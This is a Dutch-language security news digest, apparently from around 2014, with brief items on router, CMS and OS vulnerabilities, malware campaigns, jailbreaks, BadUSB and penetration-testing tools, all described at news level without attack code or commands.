    Het wordt onder andere op grote schaal binnen industriële systemen gebruikt. Neel Mehta en Stephen Roettger van het Google Security Team ontdekten verschillende kwetsbaarheden in het protocol.

  • pineappleBeing 3 months since the last major firmware release we are excited to present to you today a major milestone in the project. This firmware could have easily been 3 separate releases, so prepare for some awesome changes.

    On the usability side you'll notice that the WIFi Pineapple's Web Interface is now responsive and beautiful on mobile devices. Not just a cosmetic change, you'll notice a new help system is built-in providing answers to common questions for features such as PineAP, Networking and Configuration.

  • RouterNaar schatting meer dan 12 miljoen routers van onder andere D-Link, Huawei, TP-Link, ZTE en Zyxel zijn aan te vallen door in een http-pakketje een aangepast cookiebestand te sturen. De aanvalsmethode kan een hacker volledige toegang geven tot de admin-interface.

    De bug, die Misfortune Cookie is genoemd, is ontdekt door onderzoekers van Check Point Software. De weeffout is te vinden in RomPager, een embedded webserver die in miljoenen routers en gateways is te vinden. Door een aangepast cookie in een http-pakketje naar een kwetsbaar apparaat te sturen, ontstaat een geheugenfout. Hierdoor worden admin-rechten gegeven aan elke sessie, waardoor een aanvaller een router of gateway eenvoudig kan herconfigureren.

  • wordpress-securityOp meer dan 100.000 WordPress-sites hebben onderzoekers kwaadaardige code aangetroffen die bezoekers met malware probeert te infecteren. De code wordt van het Russische domein SoakSoak geladen. Google zou inmiddels meer dan 11.000 besmette websites op een blacklist hebben gezet.

    Bezoekers die Firefox of Chrome gebruiken krijgen bij het bezoeken van deze WordPress-websites een waarschuwing dat de site malware bevat. Volgens beveiligingsbedrijf Sucuri is het aantal getroffen websites veel groter en zou het om meer dan 100.000 WordPress-installaties gaan. Ook op het forum van WordPress klagen tal van gebruikers over SoakSoak op hun website.

  • CIO

    Resources related to information security, including news and opinion and more on software and application flaws and fixes, data breaches, the inside threat the latest hacker attacks.

    TechRepublic – Security

    TechRepublic helps IT decision-makers identify technologies and strategies to empower workers and streamline business processes. Their security section dives into the latest threats surrounding cyber security.

    US Cert

    US-CERT’s mission is to improve the nation’s cybersecurity posture, coordinate cyber information sharing, and proactively manage cyber risks.

    Wired’s Threat Level

    Privacy, crime, and online security are the topics that carry the headlines here. You’ll find everything from opinionated pieces, to the latest threat alerts.

    Zero Day from ZDNet

    Staying on top of the latest in software/hardware security research, vulnerabilities, threats and computer attacks. The Zero Day blog on ZDNet is a must for anyone keeping track of the industry.

    CERIAS Security Blog

  • Tor-And-Raspberry-PiTor is een netwerkprotocol waarbij internetverkeer geanonimiseerd wordt. Je netwerkverkeer volgt steeds een ander willekeurig pad, waardoor het lastig is om dit af te luisteren. We leggen uit hoe je van je Raspberry Pi een Tor-router maakt, zodat je met elk apparaat via Tor kunt internetten.

    01 Benodigdheden

    Als je Tor wilt gebruiken, moet je het normaal op elke computer en elk mobiel apparaat configureren waarop je via Tor wilt surfen. Wil je op verschillende apparaten anoniem surfen, dan is dat dus nogal omslachtig. Daarom gebruiken we hier een andere aanpak. We maken van een Raspberry Pi een draadloos toegangspunt en laten onze apparaten met het toegangspunt verbinden. Daarna draaien we Tor op de Pi, zodat elk apparaat dat via het toegangspunt surft, automatisch op het Tor-netwerk zit. Het enige wat we extra nodig hebben vergeleken met de vorige workshops, is een usb-wifi-adapter.

  • cryptophp cmsDe CryptoPHP-malware had op het moment van ontdekken vorige week meer dan 23.000 sites besmet. Dat maakt het Nederlandse beveiligingsbedrijf FoxIT bekend. In Nederland zou het om iets meer dan 1000 besmette sites gaan.

    FoxIT kon achterhalen met welke ip-adressen CryptoPHP contact maakte via sinkholing, waarbij malware geen verbinding meer maakt met een command & control-server van de criminelen, maar met een zelf opgezette server. In totaal hebben 23.693 ip-adressen verbinding gemaakt met de sinkholes, maar dat aantal nam in de afgelopen dagen af tot 16.786 op maandag. Overigens ligt het werkelijke aantal besmette sites hoger, aangezien shared hostingservers met minimaal één besmette site met de sinkholes verbinding maakten. Het bedrijf werkte bij de analyse van de besmettingscijfers samen met Abuse.ch, Shadoserver en Spamhaus.

  • wordpress-securityEr is een update voor het extreem populaire contentmanagementsysteem (CMS) WordPress verschenen die meerdere lekken verhelpt. Zo zijn er drie cross-site scripting (XSS)-problemen verholpen waardoor een auteur of medewerker van een WordPress-site de volledige website kon overnemen.

    Ook is er een cross-site request forgery (XSRF)-probleem opgelost waardoor een gebruiker kon worden misleid om zijn wachtwoord te wijzigen. Daarnaast behoort ook een probleem tot het verleden waardoor het mogelijk was om een Denial of Service op de website te veroorzaken bij het controleren van wachtwoorden en is het niet meer mogelijk om een hash collision-aanval uit te voeren op de accounts van gebruikers die sinds 2008 niet meer waren ingelogd.

    WordPress 4.0.1 bevat verder verschillende beveiligingsverbeteringen tegen server-side

  • tor-logoBij 81,4 procent van de gebruikers van het anonieme Tor-netwerk is het originele ip-adres te achterhalen, stellen onderzoekers van de Columbia University.

    In het onderzoek (pdf), dat tussen 2008 en 2014 werd uitgevoerd, wordt gebruik gemaakt van een aangepaste Tor-server die werd gehost door Columbia University. 

    Door een herkenbaar patroon van dataverkeer te injecteren in het netwerk, en de data bij de ingang en de uitgang van het netwerk met elkaar te vergelijken, zou bij een groot deel van de Tor-gebruikers het ip-adres te achterhalen zijn. In het laboratorium werd er een slagingspercentage van 100 procent gehaald, maar in de praktijk lag dat aandeel op 81,4. 

  • smarttv2Vrijwel elke verkochte tv is tegenwoordig een slimme tv, ofwel een smart-tv. Dat betekent dat-ie op internet is aangesloten, dat je er apps op kunt draaien en dat je er content mee kunt streamen. Ook websites bezoeken is meestal mogelijk, hoewel dat niet altijd even makkelijk gaat. Tot zover niks bijzonders. Leuker wordt het als we smart-tv’s gaan hacken.

    Nou is het hacken van smart-tv’s niet iets wat we dagelijks doen, dus vroegen we een expert de hemd van het lijf. Tim Sevenants, specialist op het gebied van home automation via zijn bedrijf Smart Living, helpt ons een eindje op weg.

    Alle apparaten in onze woning kunnen we tegenwoordig met elkaar verbinden. Thermostaten, bewakingscamera’s, koelkasten, tv-toestellen… Alles heeft een netwerkaansluiting of maakt gebruik van de cloud. Van een vaste internetaansluiting zijn we ook al niet meer afhankelijk. Tesla biedt internet in z’n fancy elektrische auto’s en natuurlijk ook onze smartphone weet altijd raad. Bij mij begon het hacken van tv-toestellen met een aanschaf van een Samsung. Toen ik me in de specificaties ging verdiepen, stuitte ik op het SamyGO-project, waarbij gebruik wordt gemaakt van de op Linux draaiende processor in die tv’s. Op de site staat een database met daarin veel modellen Samsung-tv’s en de bijbehorende hackmogelijkheden.”

    Hoe breek je in op je smart-tv?

  • windowslogoAlle recente versies van Windows bevatten een ernstige bug in de ssl/tls-software, heeft Microsoft bekendgemaakt. De bug laat een aanvaller eigen code uitvoeren door geprepareerde pakketten naar een server te sturen.

    Servers die op Windows draaien zijn daarom het meest in gevaar voor de kwetsbaarheid, maar de kwetsbaarheid kan ook desktops en laptops treffen. Dat kan als ze software draaien die op een port luistert, bijvoorbeeld een ftp-server of de web-interface van een torrent-client.

  • malware 2Onderzoekers hebben een campagne ontdekt waarbij malware werd verspreid via de wifi-netwerken van hotels. De aanvallers hadden het daarbij op speciale hotelgasten voorzien. Op de portaalpagina van het hotel om verbinding met het wifi-netwerk te maken hadden de aanvallers een iframe verborgen. Dit iframe toonde een pop-up die zich voordeed als update voor populaire software, zoals Adobe Flash Player, Google Toolbar en Windows Messenger. In werkelijkheid ging het hier om malware.

    Volgens onderzoekers van anti-virusbedrijf Kaspersky Lab (PDF) is het meest interessante aan deze aanvalsmethode dat er alleen specifieke hotelgasten werden aangevallen.

  • Een Zweedse beveiligingsonderzoeker heeft een beveiligingslek in Mac OS X Yosemite ontdekt waardoor een lokale aanvaller rootrechten kan krijgen. De "rootpipe" kwetsbaarheid werd ontdekt door Emil Kvarnhammar, die het probleem op 14 oktober op YouTube demonstreerde. Daarnaast werd het lek ook door de Zweedse krant Aftonbladet uitgemeten. Normaliter moeten gebruikers bij het gebruik van het sudo-commando een wachtwoord opgeven om rootrechten te krijgen. De exploit van Kvarnhammar omzeilt deze vereiste.Details over de kwetsbaarheid wil de onderzoeker echter pas geven als Apple het probleem heeft gepatcht, wat waarschijnlijk in januari volgend jaar zal zijn.

  • password124 gemeenten, waaronder Rotterdam, Amersfoort en Apeldoorn, wijzigden het standaardwachtwoord niet van het cms dat ze gebruikten. Twaalf van die gemeenten hadden bovendien een onveilige koppeling met DigiD, meldde Tweakers eerder al.

    Het Tros-programma Opgelicht doet dinsdagavond uit de doeken dat de gemeenten laks omgingen met de beveiliging, op basis van onderzoek van beveiligingsonderzoeker Erik Westhovens. "We konden gewoon inloggen op het cms met het standaard-admin-account", zeg Westhovens tegenover Tweakers. Westhovens wil de naam van het cms niet noemen, maar bronnen rond het onderzoek gaven eerder aan dat het gaat om Seneca Smartsite.n Apeldoorn, wijzigden het standaardwachtwoord niet van het cms dat ze gebruikten. Twaalf van die gemeenten hadden bovendien een onveilige koppeling met DigiD, meldde Tweakers eerder al.

  • IOS 8.1 jailbreakDe eerste jailbreak voor iOS 8 en 8.1 is uitgekomen. De jailbreak installeert Cydia niet op apparaten, omdat de alternatieve downloadwinkel nog niet compatibel is met de nieuwe versie van iOS.

    Daardoor is de jailbreak van PanGu vooralsnog alleen gericht op ontwikkelaars die hun jailbreak-apps compatibel willen maken met iOS 8. De jailbreaktool is momenteel alleen te downloaden voor Windows. Een OS X-versie volgt later, 'maar niet in de nabije toekomst', zo zeggen de ontwikkelaars. De jailbreaktool is bovendien in het Chinees, een Engelstalige versie volgt binnen een paar dagen.

  • upnp-logoOnderzoekers van Akamai hebben een rapport opgesteld over het misbruiken van kwetsbare UPnP-apparaten door een 'reflection & amplification Distributed Denial-of-Service (DDoS)' aanval.

    De onderzoekers zien een toename van reflection & amplification DDoS-aanvallen op het misbruiken van Internet of Things-apparaten (zoals SOHO-toestellen, routers, media servers, webcams, smart-tv's en printers).  Het onderzoek komt overeen met de bevindingen van het recent verschenen rapport van Arbor Networks (Q3 2014).

    In het rapport wordt uitgelegd dat het het SSDP-protocol misbruikt door hackers gewoon gebruikt wordt  om IoS apparaten te laten communiceren en om activiteiten te coördineren. De IoT apparaten die aan het internet zijn verbonden worden door hackers misbruikt om groot opgezette aanvallen tegen 'enterprise' doelen te coördineren.

  • De systemen van Belgische scholen zijn slecht beveiligd, waardoor kwaadwillenden kunnen inbreken om vervolgens toegang tot cijfers, informatie over leerlingen en andere gegevens te krijgen. Dat laat het Belgische televisieprogramma Telefacts vanavond zien.

    Het programma besloot met een hacker de veiligheid van de schoolnetwerken te testen. Bij één school werd het wachtwoord van de leraren binnen een halfuur gevonden, was het mogelijk om toetsen te bekijken en afwezigheidsgegevens te wissen. Zelfs het verwijderen van alle gegevens op de schoolserver behoorde tot de mogelijkheden.

  • oracleVerkeerd geconfigureerde Oracle-servers zijn de oorzaak dat de gevoelige gegevens van meer dan 100.000 mensen, alsmede vertrouwelijke gegevens van havensverzekeringsbedrijven, overheidsinstanties en gezondheidsorganisaties, eenvoudig via het internet toegankelijk waren of nog steeds zijn. Het probleem speelt bij installaties van de Oracle Reports databaseserver waar beheerders de beveiligingscontrole niet hebben ingeschakeld. Een probleem dat al sinds 2012 bekend is.

  • postnl-logoPostNL heeft klanten een e-mail gestuurd waarin het waarschuwt voor valse e-mails die op dit moment rondgaan en van het postbedrijf afkomstig lijken, maar in werkelijkheid malware bevatten. Ook op 13 oktober waarschuwde PostNL via Twitter dat er valse e-mails in omloop waren, maar de waarschuwing is nu herhaald. Zowel via de website als een e-mail aan klanten. Opmerkelijk is dat PostNL op Twitter over "phishing" spreekt, terwijl er helemaal geen sprake van phishing is. Bij phishing wordt geprobeerd om gegevens te stelen, terwijl de besmette e-mails die nu in omloop zijn een heel ander doel hebben.

  • drupal-logoHet populaire content management systeem (CMS) Drupal, dat door meer dan 1 miljoen websites wordt gebruikt, heeft een zeer ernstig beveiligingslek gedicht waardoor aanvallers websites op allerlei manieren kunnen aanvallen. De kwetsbaarheid bevindt zich in een API (Application Progamming Interface) die SQL Injection-aanvallen moet voorkomen. Het lek in deze API maakt het uitvoeren van SQL Injection juist mogelijk. Een aanvaller kan op deze manier zijn rechten op de website verhogen, willekeurige PHP-code uitvoeren en andere aanvallen uitvoeren. De kwetsbaarheid kan door anonieme gebruikers worden uitgevoerd. Het lek werd ontdekt door een bekende beveiligingsonderzoeker die in opdracht van een klant een audit van Drupal uitvoerde. Vanwege de impact hebben de ontwikkelaars van Drupal het lek als "highly critical" bestempeld.

  • Er is nieuw goud aan te boren via het internet en mogelijk in uw computer. Geheime achterdeurtjes, waar nog geen digitale sleutel voor is, worden verhandeld voor astronomische bedragen. In de cyber-wereldhandel waar geen regels gelden, heeft u geluk met 'white-hat'-hackers die waken over uw online veiligheid. Maar hun tegenhangers, de zogenaamde 'black-hat'-hackers, hebben belang bij een onveilig internet en verkopen veiligheidslekken aan de hoogste bieder. Zij zijn de hofleveranciers van veiligheidsdiensten en cyberdefensie. Wie zijn deze witte en zwarte tovenaars, die strijden om de heilige graal voor hackers: zero-days?

    Zie voledige documentaire

  • iOS 8 'Date Trick' Loophole Allows Installing Nintendo Games
    Als je een retro games liefhebber bent en wilt spelen op je iPhone, is het door een 'gat' in iOS 8 mogelijk om de klassieke SNES games op je iPhone te spelen. Dit zonder de noodzaak om je  Apple-appaat te jailbreaken. Aangezien Apple geen emulators in de App Store heeft staan ​​(wegens auteursrechtelijke redenen)is het moeilijk is van derden emulators en andere niet-goedgekeurde toepassingen te installeren.

    Maar, de nieuwste aankomende beta-versie van iOS 8.1 gepatched de beroemde "Date Trick" dat iOS emulator makers had toegestaan ​​naar de App Store te omzeilen en uit te voeren onofficiële emulators op iPhones en iPads.

  • Door een hack van de app Snapsave, waarmee gebruikers foto's van Snapchat op kunnen slaan, liggen mogelijk honderdduizenden Snapchat-foto's van gebruikers op straat. Het lijkt erop dat het gebeurde via een opendir.

    Omdat de ontvangende partij Snapsave kan gebruiken, weten gebruikers niet of hun foto's die ze via Snapchat hebben verstuurd opgeslagen zijn. Snapsave lijkt de foto's niet alleen lokaal op te slaan, maar ook door te sturen naar een server. Volgens de Noorse krant Dagbladet hebben hackers volledige controle gekregen over de database van Snapsave.

  • openbsd

    In het opensource-besturingssysteem OpenBSD is een bug ontdekt die al tien jaar in de code aanwezig zou zijn. Aanvallers zouden de weeffout kunnen benutten om ddos-aanvallen op servers uit te voeren. De bug is ontdekt in het zogenaamde polling subsystem van OpenBSD, schrijft Phoronix. Door de bug kan een aanvaller met gemanipuleerde file descriptors ddos-aanvallen uitvoeren op servers. De ontdekkers omschrijven de bug als 'kritiek' maar de fout zou desondanks al sinds februari 2004 in de broncode van OpenBSD aanwezig zijn. In Linux zou de fout niet aanwezig zijn.

  • keurig-koffie-cupsDe Canadese koffiefabrikant Club Coffee claimt dat het de beveiliging op koffiecups heeft gekraakt van concurrent Keurig. De beveiliging op basis van onzichtbare uv-inkt moest voorkomen dat gebruikers cups die niet van Keurig afkomstig zijn, kunnen gebruiken in Keurigs koffiezetapparaat.

    Anti-drmKortgeleden bracht het bedrijf de Keurig 2.0 uit, een koffiezetapparaat dat alleen koffiecups van Keurig accepteerde. De firma Club Coffee besloot te onderzoeken welk systeem Keurig gebruikt voor zijn zogeheten K-cups, waarop aanzienlijke marges zitten.

  • usb2Twee beveiligingsonderzoekers hebben op GitHub code geplaatst waarmee usb-controllers gemanipuleerd kunnen worden. Met usb-sticks kunnen zo computers veelal ongemerkt aangevallen worden. De onderzoekers zeggen met de publicatie het gevaar van 'badusb' te willen onderstrepen.

     

    In augustus deden Duitse onderzoekers tijdens Black Hat een aanvalsmethode uit de doeken door Windows- en Linux-pc's over te nemen na manipulatie van de firmware die in usb-controllers wordt gebruikt De code voor de zogeheten 'badusb-hack' werd echter niet openbaar gemaakt omdat de onderzoekers van mening waren dat het gevaar te groot was en bovendien zeer moeilijk te patchen.

  • In het tweede kwartaal van dit jaar is het aanvalsverkeer op poort 80 (HTTP) bijna verdubbeld, zo meldt internetgigant Akamai in een nieuw rapport. Het aanvalsverkeer steeg van 8% in het eerste kwartaal naar 15% in het tweede kwartaal. Een reden voor de toename wordt echter niet gegeven.

    Wel zorgt de toename van het aanvalsverkeer op poort 80 ervoor dat poort 445 niet meer op de eerste plek van meest aangevallen poorten staat. Poort 445 wordt door Microsoft Directory Services gebruikt en is al jaren de meest aangevallen poort op internet. Onder andere de beruchte Confickerworm verspreidt zich via deze poort.

    Het is pas de derde keer sinds Akamai met meten begon dat Poort 445 niet op de eerste plek staat. In het tweede kwartaal bleef het aanvalsverkeer onveranderd op 14% staan. De overige poorten in de top 10 zagen wel een toename van het aanvalsverkeer.

    port-attack 2014

     

    Bron: security.nl

  • Bash OSX PatchApple heeft vannacht een update uitgebracht voor het ernstige Bash-lek in Mac OS X. Via de kwetsbaarheid die vorige week werd ontdekt zou een aanvaller volgens Apple in bepaalde gevallen op afstand willekeurige shell commando's kunnen uitvoeren.

    Bash is een Unix-shell waarmee er opdrachten aan het systeem kunnen worden gegeven. Het wordt voor allerlei toepassingen gebruikt en veel programma's draaien het in de achtergrond. Het is in op Unix-gebaseerde systemen aanwezig, waaronder Linux en Mac OS X. Apple liet vorige week al weten dat Mac OS X-gebruikers standaard geen risico lopen. Alleen als er bepaalde services werden gedraaid zou een aanvaller het lek kunnen misbruiken.

  • kali linux nethunterEen groep ontwikkelaars heeft een besturingssysteem voor hackers en security-professionals speciaal aangepast voor een aantal Nexus-toestellen, wat een mobiel maar volledig functioneel penetratietestplatform oplevert. Het Kali Linux-besturingssysteem werd vorig jaar maart.

    Een gebruiker uit de Kali Linux-gemeenschap genaamd "BinkyBear" en beveiligingsbedrijf Offensive Security, dat Kali ontwikkelde, hebben nu Kali Linux Nethunter gepresenteerd. Een versie van Kali Linux speciaal voor Nexus-toestellen waarmee allerlei soorten aanvallen en tests zijn uit te voeren, zoals het opzetten van kwaadaardige access points, de BadUSB-aanval en man-in-the-middle-aanvallen.

  • bash bugIs Shellshock erger dan Heartbleed?
    Servers, routers en pc's zijn kwetsbaar door een shell-bug waardoor apparaten op afstand kunnen worden overgenomen. Hoe groot is het probleem?

    Paniek in securityland om de Unix-bug, meteen Bashpocalypse of Shellshock gedoopt, die allerlei apparaten (met Linux, Unix of Mac OS X) kwetsbaar maakt. Maar op welke manier precies, is nog niet helemaal duidelijk, gezien de onverwachte resultaten die kunnen volgen. De vergelijking met OpenSSL-gat Heartbleed is al snel gemaakt, maar de ene bron stelt dat het probleem groot is maar zich niet verhoudt tot een gat in OpenSSL, terwijl de andere onderzoeker vindt dat het zelfs nog een stapje erger dan Heartbleed is.

    Bash-gat krijgt score 10 van 10

  • netis routerNetcore Routers is een populair netwerkapparatuur merk in China. Nu blijkt dat ze een grote open achterdeur die vrij gemakkelijk kan worden misbruikt door aanvallers. Buiten China worden deze producten verkocht onder de merknaam Netis. Deze backdoor laat cybercriminelen eenvoudig willekeurige code op deze routers draaien.
    Hoe werkt deze backdoor?
     
    Simpel gezegd is het een open UDP poort (53413). Deze poort is bereikbaar vanaf de WAN kant van de router. Dit betekent dat als de betreffende router een extern toegankelijke IP-adres heeft dat een aanvaller via het internet toegang tot deze backdoor heeft. 

  • honeypotEen nieuwe versie van Honeydrive is uitgebracht. HoneyDrive 3 is een van de bekenste honeypot Linux distro's. Het is een virtuele appliance (OVA) met Xubuntu Desktop 12.04.4 LTS editie geïnstalleerd. Het bevat meer dan 10 vooraf geïnstalleerde en vooraf geconfigureerde honeypot softwarepakketten zoals:

    • Kippo SSH honeypot,
    • Dionaea en Amun malware honeypots,
    • Honeyd low-interactie honeypot,
    • Glastopf web honeypot en Wordpot,
    • Conpot SCADA / ICS honeypot,
    • Thug en PhoneyC honeyclients en meer.

    Daarnaast bevat veel nuttige vooraf geconfigureerde scripts en hulpprogramma's te analyseren, visualiseren en de gegevens kan vastleggen, zoals Kippo-Graph, Honeyd-Viz, DionaeaFR, een eland stack en nog veel meer te verwerken. Tenslotte zijn er ook bijna 90 bekende malware analyse, forensische en netwerk monitoring tools aanwezig.

  • vnc-logoDuizenden computers op het internet staan wagenwijd open doordat ze het programma VNC draaien zonder dat dit van een wachtwoord is voorzien, waardoor een onderzoeker onlangs bij allerlei mensen live kon meekijken. VNC is software om op afstand toegang tot computers te krijgen.

    Het kan bijvoorbeeld worden gebruikt voor beheren van een systeem of het helpen van gebruikers. Tijdens de afgelopen Defcon conferentie in Las Vegas gaf beveiligingsonderzoeker Paul McMillan een demonstratie waarbij hij naar onbeveiligde en open VNC-installaties zocht.

  • IE

    IEEr zijn in totaal 26 Updates voor Internet Explorer beschikbaar. Eén van deze lekken was al openbaar gemaakt voordat de patch van Microsoft verscheen, terwijl een ander lek actief werd aangevallen voordat de update beschikbaar was. Volgens de softwaregigant gaat het om "beperkte aanvallen", maar verdere details worden niet gegeven. De update voor IE is dan ook als kritiek bestempeld.

  • synologyVerschillende gebruikers van Synology-systemen klagen dat hun nas is getroffen door ransomware. De malware, met de naam Synolocker, versleutelt bestanden; gebruikers moeten honderden euro's betalen om weer bij hun bestanden te kunnen.

    De gebruikers klagen op het forum van Synology dat ze niet meer bij hun bestanden kunnen. De configuratiepagina van hun nas-systeem is vervangen door een waarschuwing dat de bestanden zijn versleuteld, en dat de gebruiker geld moet betalen om de encryptiesleutel te krijgen. Gebruikers zouden 0,6 bitcoin, omgerekend circa 260 euro, moeten betalen voor toegang. Het is niet duidelijk of gebruikers na betaling weer toegang krijgen.

  • sambaDe ontwikkelaars achter Samba, de software die in Linux wordt gebruikt voor filesharing via het smb-protocol van Windows, hebben vrijdag in allerijl een patch uitgebracht vanwege een ernstig beveiligingsprobleem. Alle 4.x.x-versies waren kwetsbaar.

    Het beveiligingsprobleem maakt het mogelijk om met een browser pakketjes te overschrijven in de nmbd-server, een daemon die kan communiceren met NetBIOS. Daardoor is het mogelijk om op afstand root-code uit te voeren, zo maakte Samba bekend.

  • usb2Twee onderzoekers zullen volgende week tijdens de Black Hat conferentie in Las Vegas demonstreren hoe USB-sticks een computer volledig kunnen overnemen, door malware die niet op de stick zelf staat, maar in de firmware van het apparaat is verstopt en nauwelijks te detecteren.

    Ook zullen onderzoekers Karsten Nohl en Jakob Lell een zichzelf verspreidend USB-virus laten zien. "USB is inmiddels zo gewoon dat we nog nauwelijks stilstaan over de veiligheidsgevolgen. USB-sticks worden af en toe op virussen gescand, maar we beschouwen USB gewoon als veilig, tot nu toe", zo laten de onderzoekers in hun aankondiging over BadUSB weten, zoals de aanval wordt genoemd.

    De onderzoekers zijn maanden bezig geweest met het reverse engineeren van de firmware, die wordt gebruikt voor de besturing van de USB-stick. Ze ontdekten dat de firmware geherprogrammeerd kan worden om malware te verbergen. Het probleem is echter niet alleen beperkt tot USB-sticks, ook andere USB-apparaten zoals toestenborden, muizen en smartphones zouden kwetsbaar zijn.

    Geen patch

  • instagram-logoEen lek in de populaire fotodienst Instagram dat al anderhalf jaar bekend is, is nog steeds aanwezig, waardoor een aanvaller de accounts van gebruikers die de Instagram-app op hun iPhone of iPad hebben geïnstalleerd kan kapen. De Instagram app op iOS blijkt sessiecookies onversleuteld uit te wisselen.

    Een aanvaller die zich op hetzelfde netwerk als een Instagram-gebruiker bevindt, bijvoorbeeld in het geval van een open wifi-netwerk, kan hierdoor de cookies kapen en zo het account overnemen. Het probleem werd in november 2012 al ontdekt en aan Instagram gemeld, maar niet verholpen.

  • IEAanvallers gebruiken verschillende functies in Internet Explorer die ervoor zorgen dat er informatie over de beveiliging van een computer en geïnstalleerde software en updates kan worden opgevraagd, zonder dat gebruikers hier weet van hebben. Met de informatie kan een verdere aanval worden uitgewerkt.

    Daarvoor waarschuwt het beveiligingsbedrijf AlienVault Labs, dat verschillende aanvallen heeft gezien waarbij deze tactiek werd toegepast. Voor aanvallers is het belangrijk om te weten welke software er op de computer van een potentieel doelwit geïnstalleerd is. De aanwezigheid van Microsofts Enhanced Mitigation Experience Toolkit (EMET) maakt het bijvoorbeeld lastiger om beveiligingslekken aan te vallen, zegt analist Jaime Blasco.

  • wordpress-securityEen ernstig lek in een populaire WordPress-plug-in is de afgelopen weken gebruikt om tienduizenden WordPress-sites over te nemen, waaronder websites die de plug-in niet gebruiken. Het gaat om een kwetsbaarheid in de MailPoet-plug-in, die voor het versturen van nieuwsbrieven wordt gebruikt.

    Via het lek, dat begin juli werd gepatcht, kan een aanvaller alles toevoegen op een website, zoals kwaadaardige code voor het besmetten van bezoekers, versturen van spam tot het defacen van de website zelf. MailPoet heeft meer dan 2 miljoen downloads, wat de populariteit onder aanvallers verklaart. Het probleem raakt echter ook websites die de plug-in niet hebben geïnstalleerd, zo meldt beveiligingsbedrijf Sucuri.

  • disqus-logoEr is een 'Remote Code Execution' (RCE) kwetsbaarheid in de commentaar en discussie service, Disqus ontdekt. Dit is een plugin voor het de meest populaire blogging platform Wordpress. Op dit moment zijn er meer dan 70 miljoen websites die draaien op WordPress. Ongeveer 1,3 miljoen van hen gebruik de 'Disqus' plugin. Dit maakt het een van de populaire 'commentaren & discussie' plugin voor Wordpress.

    Het security team van de beveiligingsfirma Sucuri ontdekte de fout bij analyse van een aantal aangepaste JSON parser files. De variabele parsing functie maakt het mogelijk om willekeurig opdrachten op de server uit te voeren. Dit met behulp van onveilig gecodeerde PHP eval ( ) functie.
  • wordpress-securityEr is recentelijk een Zero-day kwetsbaarheid in de populaire 'image resize' bibliotheek TimThumb ontdekt. Deze wordt in duizenden WordPress thema's en plugins gebruikt.
    De kritieke kwetsbaarheid is door Pichaya Morimoto ontdekt. In de TimThumb Wordpress plugin versie 2.8.13, ligt in haar "Webshot" functie die, indien ingeschakeld, laat aanvallers om commando's op een externe website.

    De kwetsbaarheid kan een aanvaller willekeurige PHP-code op afstand uit te voeren op de getroffen website. Zodra de PHP-code is uitgevoerd, kan de website gemakkelijk worden aangetast in de manier waarop de aanvaller wil. Tot nu toe is er geen patch beschikbaar voor het lek.

  • crytek-logoHet is nu nog makkelijk geworden om van scratch een Crytek game te ontwikkelen. De Starter-Kit wordt geleverd met complete starters contant en leert je hoe je een spel in CryENGINE vanaf nul opbouwd. Op de planning staan om nog meer starter kits toe te voegen voor genres als RPG, RTS en 3D sidescroller Platformers. Het uiteindelijke doel is het hebben van een omgeving waar gebruikers hun eigen content kunnen toevoegen en zelfs kunnen verkopen.

     

    De starters-kit van ontwikkelaar richmar1 is gratis en biedt het volgende aan:

    • Volledige broncode uitvoering van alle benodigde interfaces om een ​​volledige CryEngine spel vanaf nul te maken.
    • Geen voorbeeld maar standaard FPS Gamedll code.
    • Elke interface,  class , methode, en member variabele is volledig gedocumenteerd en heeft methode documentatie per-parameter en Intellisense.
    • Volledig uitgerust Visual Studio project template & wizard.
    • No-Fuss Installer die eenvoudig alles installeerd/configureerd.
    • licentie model die je vrijlaat in het gebruik van het spel sjabloon, zelfs verkopen.

     

     

    Download the CryENGINE Blank Game Starter-Kit here

  • iphonelockEen team van Chinese ontwikkelaars heeft onder de naam Pangu een jailbreak uitgebracht voor apparaten op iOS 7.1.1. Daardoor kunnen gebruikers onder meer de iPad Air en iPhone 5s jailbreaken. De tool werkt vooralsnog alleen onder Windows.

    De jailbreak kwam maandagavond online op de site van Pangu en is Chineestalig. Inmiddels is er ook Engelstalige versie. De Chinese ontwikkelaars zeggen ook te werken aan een een versie voor OS X, maar die is nog niet uit. Het jailbreakprogramma is bijna 80MB groot.

  • rubberduckySinds 2010 is de USB Rubber Ducky een favoriet onder hackers, penetratie testers en IT-professionals. De combinatie van een eenvoudig te gebruiken scripttaal en de formidabele hardware maakt dit het deale hacktool.

    De 'Rubber Duck' lijkt op een USB-stick maar bevat hardware met een microcontroller met een microSD-kaart interface. Het apparaat kan fungeren als een soort van USB-slave. Op bijgevoegde SD kaart bevind zich de payload (programma of script).  Het standaard profiel voor de Rubber Duck is een USB-toetsenbord. Sluit hem aan, en hij zal toetsaanslagen (gestuurd via een script bestand) genereren.

  • androidOntwikkelaar Geohot, onder meer bekend van de PS3-hack en iPhone-jailbreaks, heeft een universele root-methode voor Android-apparaten uitgebracht. De root-methode zou moeten werken op elk Android-apparaat met een kernel van voor 3 juni.

    De methode heeft als naam Towelroot en werkt via het installeren van een apk-bestand van de site van Geohot. Hoewel volgens de ontwikkelaar vrijwel alle toestellen zouden moeten werken, vermeldt hij dat de 'nieuwste toestellen' van HTC en Motorola niet functioneren, omdat de /system-partitie is beschermd.

  • ZMap is a new network scanner and seems more efficient and timeless consuming, than the venerable NMAP. It was developed by a team of computer scientists at the University of Michigan.

    This tool is no more no less able to scan all IPv4 address range in 45 minutes (1300 times faster than NMAP). This performance is feasible because they decided to remove some features (connection state in particular). As a reminder, it's not allowed to scan a network if you're not owner or if you don't have any owner's approval. Please take care if you decide to test this tool 


    Official website: https://zmap.io/

  • Het Amerikaanse bedrijf Pwnie Express heeft een nieuwe versie van de Pwn Phone ontwikkeld, een speciale smartphone voor hackers, penetratietesters en security professionals die de veiligheid van systemen en netwerken willen testen. De Pwn Phone is op Android gebaseerd.

    De eerste generatie Pwn Phone die in 2012 verscheen draaide op een Nokia N900 en het Maemo 5 Linux-gebaseerde besturingssysteem. De nieuwe versie, de Pwn Phone 2014, gebruikt als hardware de LG Nexus 5. De ontwikkelaars hebben een Android 4.4 Kit Kat kernel opnieuw gecompileerd. In de back-end draait het een zelfontwikkelde afgeleide van Kali Linux, genaamd Pwnix.

    "Het draait eigenlijk een volwaardig Debian besturingssysteem op de back-end van Android", zegt Kevin Reilly van de Pwnie Express tegenover Ars Technica. Het voordeel van de opnieuw gecompileerde Android-kernel is dat de Pwn Phone ook als USB-host kan fungeren. Daarom kan het toestel externe USB-adaptors voor wifi, ethernet en Bluetooth gebruiken

